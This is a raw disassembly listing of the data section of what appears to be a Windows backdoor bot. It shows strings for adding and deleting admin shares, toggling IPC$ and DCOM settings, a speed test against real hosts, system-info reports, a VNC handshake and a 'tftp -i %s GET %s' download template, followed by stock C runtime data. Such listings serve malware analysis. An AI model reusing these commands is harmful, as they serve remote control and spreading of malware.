db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotRead_0 db '- Could not read data from proccess',0Dh,0Ah,0
align 10h
unk_438AB0 db 2Dh ; - ; DATA XREF: sub_41C9D4+198�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0
align 4
dword_438AE4 dd 234032Dh, 2646D63h, 52202D03h, 746F6D65h, 6F432065h
; DATA XREF: sub_41C9D4+150�o
dd 6E616D6Dh, 72502064h, 74706D6Fh, 0
dword_438B08 dd 5C3A44h, 2444h, 5C3A43h, 2443h, 494D4441h, 244Eh
; DATA XREF: seg002:004434DC�o
; seg002:004434D8�o ...
aIpc db 'IPC$',0 ; DATA XREF: seg002:off_4434C0�o
align 4
dword_438B28 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CE70�o
; seg000:0041D184�o
aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_438B58 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CE5A�o
aNetworkSharesD db '- Network shares deleted.',0
align 10h
dword_438B80 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:loc_41CDF3�o
aFailedToDelete db '- Failed to delete ',27h,'%S',27h,' share.',0
align 4
dword_438BAC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CDEC�o
aShareSDeleted_ db '- Share ',27h,'%S',27h,' deleted.',0
align 10h
dword_438BD0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:loc_41CD63�o
aFailedToDele_0 db '- Failed to delete ',27h,'%s',27h,' share.',0
align 4
dword_438BFC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CD5C�o
aShareSDelete_0 db '- Share ',27h,'%s',27h,' deleted.',0
align 10h
dword_438C20 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:loc_41CCBB�o
; seg000:loc_41CFD9�o
aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 10h
dword_438C50 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:loc_41CCB4�o
aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0
dword_438C8C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:loc_41CC9C�o
aRestrictedAcce db '- Restricted access to the IPC$ Share.',0
align 10h
dword_438CC0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CC95�o
aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: seg000:0041CC76�o
; seg000:0041CF98�o
align 10h
dword_438D10 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CC1A�o
; seg000:0041CF3C�o
aFailedToOpenDc db '- Failed to open DCOM registry key.',0
dword_438D40 dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 64204D4Fh
; DATA XREF: seg000:loc_41CBFC�o
dd 62617369h, 2E64656Ch, 0
dword_438D60 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CBF5�o
aDisableDcomFai db '- Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: seg000:0041CBDD�o
; seg000:0041CEFF�o
align 10h
dword_438D90 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041D16C�o
aNetworkSharesA db '- Network shares added.',0
aC_0 db '%c:\',0 ; DATA XREF: seg000:0041D0D6�o
align 4
aC_1 db '%c$',0 ; DATA XREF: seg000:0041D0C5�o
dword_438DC0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:loc_41D058�o
; seg000:loc_41D11F�o
aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0
dword_438DE8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041D051�o
; seg000:0041D118�o
aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0
dword_438E08 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:loc_41CFD2�o
aFailedToOpen_0 db '- Failed to open IPC$ restriction registry key.',0
dword_438E44 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:loc_41CFBA�o
aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0
align 4
dword_438E7C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CFB3�o
aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0
align 4
dword_438EBC dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 65204D4Fh
; DATA XREF: seg000:loc_41CF1E�o
dd 6C62616Eh, 2E6465h
dword_438ED8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: seg000:0041CF17�o
aEnableDcomFail db '- Enable DCOM failed.',0
align 4
flt_438EFC dd 9.765625e-4 ; DATA XREF: sub_41D235+1B9�r
flt_438F00 dd 8.0 ; DATA XREF: sub_41D235+1B3�r
flt_438F04 dd 0.0 ; DATA XREF: sub_41D235+170�r
flt_438F08 dd 1.0e-3 ; DATA XREF: sub_41D235:loc_41D39C�r
flt_438F0C dd 4.2949673e9 ; DATA XREF: sub_41D235+161�r
; sub_41D235+1AA�r
aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41D235+D5�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 8
dword_438F48 dd 234032Dh, 65657073h, 73657464h, 2D030274h, 75450220h
; DATA XREF: sub_41D41B+1A7�o
dd 65706F72h, 25203A02h, 626B2064h, 732F7469h, 53550220h
dd 203A0241h, 6B206425h, 2F746962h, 41022073h, 2616973h
dd 6425203Ah, 69626B20h, 20732F74h, 65764102h, 65676172h
dd 25203A02h, 626B2064h, 732F7469h, 0
aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41D41B+C4�o
align 4
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41D41B+BD�o
aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41D41B+B6�o
align 4
aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41D41B+AF�o
align 4
aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41D41B+A8�o
align 10h
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41D41B+A1�o
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41D41B+9A�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41D41B+93�o
align 4
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41D41B+8C�o
align 4
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41D41B+85�o
align 4
aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41D41B+7E�o
align 4
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41D41B+77�o
align 4
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41D41B+70�o
align 4
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41D41B+69�o
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41D41B+62�o
aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41D41B+5B�o
align 4
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41D41B+54�o
align 4
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41D41B+4D�o
align 4
aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41D41B+46�o
align 4
aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41D41B+3F�o
align 4
aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41D41B+38�o
align 4
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41D41B+31�o
align 4
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41D41B+2A�o
align 4
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41D41B+23�o
align 4
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41D41B+1C�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41D41B+15�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_41D5F8+39�o
dword_439160 dd 234032Dh, 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah
; DATA XREF: sub_41D779+24C�o
dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h
dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh
dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h
dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h
dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h
dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h
dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h
dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h
dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h
dd 74705502h, 2656D69h, 7325203Ah, 2Eh
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_41D779+161�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41D779:loc_41D8AC�o
align 10h
aSS_4 db '%s (%s)',0 ; DATA XREF: sub_41D779+C0�o
dword_439268 dd 234032Dh, 6974656Eh, 26F666Eh, 2202D03h, 65707954h
; DATA XREF: sub_41D9E5+9E�o
dd 25203A02h, 25282073h, 202E2973h, 20504902h, 72646441h
dd 2737365h, 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h
dd 7325203Ah, 2Eh
off_4392AC dd offset word_412F4E ; DATA XREF: sub_41D9E5:loc_41DA52�o
off_4392B0 dd offset loc_4E414C ; DATA XREF: sub_41D9E5:loc_41DA4B�o
aDialUp db 'Dial-up',0 ; DATA XREF: sub_41D9E5+57�o
aNotConnected db 'Not connected',0 ; DATA XREF: sub_41D9E5+41�o
align 4
db 2Dh ; -
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aUrlVisited_ db ' URL visited.',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aCouldNotOpenAC db ' Could not open a connection.',0
align 10h
dd 234032Dh, 69736976h, 2D030274h, 766E4920h, 64696C61h
dd 4C525520h, 2Eh, 2A2F2Ah
dword_4393A0 dd 2 dup(0) ; DATA XREF: sub_41DCBE+16�o
dword_4393A8 dd 2 dup(0) ; DATA XREF: sub_41DCBE+C�o
; seg000:0041DE0F�o
aTftpISGetS db 'tftp -i %s GET %s',0 ; DATA XREF: seg000:0041DFB8�o
align 4
aC_2 db '%c',0 ; DATA XREF: seg000:0041DF37�o
align 4
dword_4393C8 dd 0DFFh ; DATA XREF: seg000:0041DE24�o
dword_4393CC dd 0EBFFh ; DATA XREF: seg000:0041DE19�o
dword_4393D0 dd 201h ; DATA XREF: seg000:0041DE04�o
aRfb003_008 db 'RFB 003.008',0Ah,0 ; DATA XREF: seg000:0041DDF8�o
align 4
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_41F116+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_41F116�o
oword_439400 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_41FCC0+E3�r
oword_439410 xmmword 4330000000000000433h ; DATA XREF: sub_41FCC0+46�r
oword_439420 xmmword 4330000000000000BFF0000000000000h ; DATA XREF: sub_41FCC0+10E�r
oword_439430 xmmword 80000000000000008000000000000000h
; DATA XREF: sub_41FCC0:loc_41FDBD�r
; sub_41FCC0+106�r
oword_439440 xmmword 7FFh ; DATA XREF: sub_41FCC0+5F�r
dword_439450 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_420383+E�o
dd 3, 19930520h, 2 dup(0)
oword_439470 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_4203C0+E3�r
; sub_4203C0+10A�r
oword_439480 xmmword 4330000000000000433h ; DATA XREF: sub_4203C0+46�r
oword_439490 xmmword 0 ; DATA XREF: sub_4203C0:loc_4204C1�r
oword_4394A0 xmmword 7FFh ; DATA XREF: sub_4203C0+5F�r
dbl_4394B0 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: sub_4203C0:loc_4204BA�r
byte_4394B8 db 0FFh ; DATA XREF: sub_4222C8+5E�r
db 3 dup(0FFh)
dd offset dword_4209F0+6Ch
dd offset dword_4209F0+70h
align 8
dword_4394C8 dd 0FFFFFFFFh, 420EAFh, 420EC3h, 0 ; DATA XREF: start-C32F1�o
byte_4394D8 db 6 ; DATA XREF: sub_4222C8:loc_422334�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: seg002:off_4437D0�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: seg002:off_4437CC�o
align 10h
dword_439550 dd 0FFFFFFFFh, 422B6Fh, 422B73h, 41h dup(0) ; DATA XREF: sub_422B83-2F�o
asc_439660: ; DATA XREF: seg002:off_4437D8�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
db 2 dup(0)
word_439862 dw 20h ; DATA XREF: seg002:off_4437DC�o
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
dword_439A68 dd 0FFFFFFFFh, 423284h, 423288h, 0 ; DATA XREF: sub_423257+2�o
dd 0FFFFFFFFh, 4232C8h, 4232CCh, 0
dword_439A88 dd 0FFFFFFFFh, 4239CBh, 4239CFh, 2 dup(0) ; DATA XREF: sub_423327+5�o
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
aAtan db 'atan',0 ; DATA XREF: sub_424391:loc_4245CA�o
align 4
aCeil db 'ceil',0 ; DATA XREF: sub_424391:loc_4245C1�o
align 10h
aFloor db 'floor',0 ; DATA XREF: sub_424391:loc_4245B8�o
align 4
aModf db 'modf',0 ; DATA XREF: sub_424391+20F�o
align 10h
aExp2 db 'exp2',0 ; DATA XREF: sub_424391:loc_424543�o
align 4
aExp10 db 'exp10',0 ; DATA XREF: sub_424391+1A2�o
align 10h
aLog2 db 'log2',0 ; DATA XREF: sub_424391:loc_424510�o
; sub_424391+192�o
align 4
aPow db 'pow',0 ; DATA XREF: sub_424391:loc_42443B�o
; sub_424391+CF�o ...
aLog10 db 'log10',0 ; DATA XREF: sub_424391:loc_4243FE�o
; sub_424391+7C�o ...
align 4
aExp db 'exp',0 ; DATA XREF: sub_424391+4E�o
; sub_424391+61�o ...
dword_439B48 dd 0FFFFFFFFh, 42463Eh, 424642h ; DATA XREF: sub_42461D+2�o
aAuthenticamd db 'AuthenticAMD',0 ; DATA XREF: seg000:004246C5�o
align 8
dbl_439B68 dq 1.0 ; DATA XREF: sub_424720+6D�r
; sub_424BE6+2A�r ...
dbl_439B70 dq 0.0 ; DATA XREF: sub_42751C+8D�r
; sub_42751C+AF�r ...
aE000 db 'e+000',0 ; DATA XREF: sub_42490B+93�o
align 10h
dbl_439B80 dq 4.195835e6 ; DATA XREF: sub_424BE6+F�r
dbl_439B88 dq 3.145727e6 ; DATA XREF: sub_424BE6+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_424C26+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_424C26�o
align 4
dword_439BB8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_424CB7+2�o
dd offset word_424D5E
align 8
dd offset dword_424D24
dd offset dword_424D24+9
dword_439BD0 dd 0FFFFFFFFh, 424DA8h, 424DB1h, 0 ; DATA XREF: sub_424D74+2�o
dword_439BE0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_424DD8+2�o
dd offset dword_424F14+2
align 10h
dd offset aLeL ; "‹Eì‹"
dd offset dword_424E58+49h
dword_439BF8 dd 0FFFFFFFFh, 4250F2h, 4250F6h, 0 ; DATA XREF: sub_424F82+2�o
dword_439C08 dd 0FFFFFFFFh, 4254D2h, 4254D6h, 0 ; DATA XREF: sub_4254B5+2�o
dword_439C18 dd 0FFFFFFFFh, 4254FFh, 425503h ; DATA XREF: sub_4254E2+2�o
dword_439C24 dd 0 ; DATA XREF: sub_425B55+1C�o
; sub_426DA0+1E�o ...
dword_439C28 dd 0FFFFFFFFh, 425E4Eh, 425E52h, 0FFFFFFFFh, 425C4Bh, 425C4Fh
; DATA XREF: sub_425B55+2�o
dd 0FFFFFFFFh, 425D19h, 425D1Dh, 746E7572h, 20656D69h
dd 6F727265h, 2072h, 534F4C54h, 72652053h, 0D726F72h, 0Ah
dd 474E4953h, 72726520h, 0A0D726Fh, 0
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: seg002:off_443A8C�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_426069+123�o
; sub_426FC0+132�o
align 4
asc_43A018 db 0Ah ; DATA XREF: sub_426069+107�o
; sub_426FC0+FC�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_426069+F5�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_426069+C1�o
; sub_426FC0+CC�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_426069+8E�o
; sub_426FC0+8B�o
align 8
dword_43A058 dd 0FFFFFFFFh, 426E79h, 426E7Dh ; DATA XREF: sub_426DA0+2�o
aProgram db 'Program: ',0 ; DATA XREF: sub_426FC0+108�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: sub_426FC0+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: sub_426FC0:loc_42701D�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: sub_426FC0+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: sub_426FC0+47�o
align 4
dword_43A208 dd 0FFFFFFFFh, 426FF8h, 426FFCh, 78656E5Fh, 74666174h
; DATA XREF: sub_426FC0+5�o
dd 7265h, 676F6C5Fh, 62h, 6E795Fh, 31795Fh, 30795Fh, 78657266h
dd 70h, 646F6D66h, 0
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
dword_43A2A8 dd 0FFFFFFFFh, 4283F0h, 4283F4h ; DATA XREF: sub_42831E+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_428710+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_428710+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_428710+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_428710+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_428710+2E�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_428FE8:loc_4290D4�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_428FE8+CF�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_428FE8+BE�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_428FE8+A4�o
align 4
dd offset dword_43A474
off_43A33C dd offset byte_429779 ; DATA XREF: sub_429712+20�o
; sub_429823+26�o
dd offset word_42974E
dd offset dword_43A4C0
off_43A348 dd offset byte_429795 ; DATA XREF: sub_42987E+33�o
; sub_42987E+4C�o
dd offset word_42974E
dd offset dword_43A50C
off_43A354 dd offset dword_4297BC ; DATA XREF: sub_4297E3+33�o
dd offset word_42974E
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_4297E3+D�o
aStringTooLong db 'string too long',0 ; DATA XREF: sub_42987E+D�o
dd offset dword_43A550
off_43A388 dd offset dword_429998+12h ; DATA XREF: seg002:off_443FC4�o
; seg002:off_443FDC�o ...
dd offset dword_43A57C
off_43A390 dd offset dword_429A44 ; DATA XREF: sub_4299C6+A�o
; sub_4299D7+8�o
dd offset dword_429A24+13h
aUnknownExcepti db 'Unknown exception',0
align 10h
dword_43A3B0 dd 0FFFFFFFFh, 429C94h, 429C98h, 0FFFFFFFFh, 429D21h, 429D25h
; DATA XREF: sub_429B7E+2�o
dword_43A3C8 dd 0FFFFFFFFh, 429F28h, 429F2Ch, 0FFFFFFFFh, 429F9Ah, 429F9Eh
; DATA XREF: sub_429E31+2�o
dd 48h, 0Eh dup(0)
dd offset dword_4437D4
dd offset dword_43A590
dword_43A424 dd 0Ah, 443FC4h, 2 dup(0) ; DATA XREF: seg001:0043A45C�o
; seg001:0043A4A8�o ...
dd 0FFFFFFFFh, 2 dup(0)
off_43A440 dd offset off_443FDC ; DATA XREF: seg001:0043A458�o
; seg001:0043A4A4�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43A440
dd offset dword_43A424+4
dword_43A460 dd 3 dup(0) ; DATA XREF: seg001:0043A484�o
dd 2, 43A458h
dword_43A474 dd 3 dup(0) ; DATA XREF: seg001:0043A338�o
dd offset off_443FDC
dd offset dword_43A460+4
off_43A488 dd offset off_443FFC ; DATA XREF: seg001:0043A4A0�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43A488
dd offset off_43A440
dd offset dword_43A424+4
dword_43A4AC dd 3 dup(0) ; DATA XREF: seg001:0043A4D0�o
dd 3, 43A4A0h
dword_43A4C0 dd 3 dup(0) ; DATA XREF: seg001:0043A344�o
dd offset off_443FFC
dd offset dword_43A4AC+4
off_43A4D4 dd offset off_44401C ; DATA XREF: seg001:0043A4EC�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43A4D4
dd offset off_43A440
dd offset dword_43A424+4
dword_43A4F8 dd 3 dup(0) ; DATA XREF: seg001:0043A51C�o
dd 3, 43A4ECh
dword_43A50C dd 3 dup(0) ; DATA XREF: seg001:0043A350�o
dd offset off_44401C
dd offset dword_43A4F8+4
off_43A520 dd offset off_44403C ; DATA XREF: seg001:0043A538�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_43A520
dword_43A53C dd 3 dup(0) ; DATA XREF: seg001:0043A560�o
dd 1, 43A538h
dword_43A550 dd 3 dup(0) ; DATA XREF: seg001:0043A384�o
dd offset off_44403C
dd offset dword_43A53C+4
dd offset dword_43A424+4
dword_43A568 dd 3 dup(0) ; DATA XREF: seg001:0043A58C�o
dd 1, 43A564h
dword_43A57C dd 3 dup(0) ; DATA XREF: seg001:0043A38C�o
dd offset off_443FC4
dd offset dword_43A568+4
dword_43A590 dd 1FF7Fh, 2007Fh, 20294h, 25F68h, 2A056h, 2A068h, 2A082h
; DATA XREF: seg001:0043A420�o
dd 2A09Ah, 2A0ACh, 2A0BEh, 0
dword_43A5BC dd 3 dup(0) ; DATA XREF: sub_423257+C�o
; sub_423257:loc_42326A�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 4 dup(0)
dd offset byte_40F0F7
dd 3 dup(0)
dd offset byte_40F083
dd 2 dup(2), 3, 1, 43A5E8h, 2 dup(0)
dd 3, 1, 43A5F8h, 19930520h, 4, 43A5C8h, 2, 43A608h, 2 dup(0)
dd 0FFFFFFFFh, 42A060h, 19930520h, 1, 43A64Ch, 4 dup(0)
dd 0FFFFFFFFh, 42A072h, 0
dd offset dword_42A070+0Ah
dd 19930520h, 2, 43A670h, 4 dup(0)
dd 0FFFFFFFFh, 42A08Ch, 19930520h, 1, 43A69Ch, 4 dup(0)
dd 0FFFFFFFFh, 42A0A4h, 19930520h, 1, 43A6C0h, 5 dup(0)
dd offset off_443FC4
align 10h
dd 0FFFFFFFFh, 0
dd 0Ch, 4299D7h, 0
dd offset off_443FDC
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 429823h, 0
dd offset off_44401C
align 8
dd 0FFFFFFFFh, 0
dword_43A730 dd 28h, 429866h, 3, 43A71Ch, 43A700h, 43A6E4h ; DATA XREF: seg001:0043A754�o
dword_43A748 dd 0 ; DATA XREF: sub_4297E3+2A�o
dd offset dword_4297BC+1Ch
dd 0
dd offset dword_43A730+8
dd 0FFFFFFFFh, 42A0B6h, 19930520h, 1, 43A758h, 4 dup(0)
dd 0FFFFFFFFh, 42A0A4h, 19930520h, 1, 43A77Ch, 5 dup(0)
dd offset off_443FFC
dd 0
dd 0FFFFFFFFh, 0
dword_43A7B4 dd 28h, 4298BEh, 3, 43A7A0h, 43A700h, 43A6E4h ; DATA XREF: seg001:0043A7D8�o
dword_43A7CC dd 0 ; DATA XREF: sub_42987E+2A�o
dd offset dword_429798+19h
align 8
dd offset dword_43A7B4+8
dd 0FFFFFFFFh, 42A0B6h, 19930520h, 1, 43A7DCh, 4 dup(0)
dd 3A83Ch, 2 dup(0)
dd 3B008h, 2B000h, 3AA0Ch, 2 dup(0)
dd 3B024h, 2B1D0h, 5 dup(0)
dd 3AA64h, 3AA72h, 3AA80h, 3AA92h, 3AAA8h, 3AABEh, 3AAC6h
dd 3AAD6h, 3AAE6h, 3AAF8h, 3AB0Ch, 3AB1Eh, 3AB2Ch, 3AB3Ch
dd 3AB48h, 3AB58h, 3AB68h, 3AB76h, 3AB8Ch, 3AB98h, 3ABAEh
dd 3ABC4h, 3ABDAh, 3ABEAh, 3ABFEh, 3AC10h, 3AC20h, 3AC2Eh
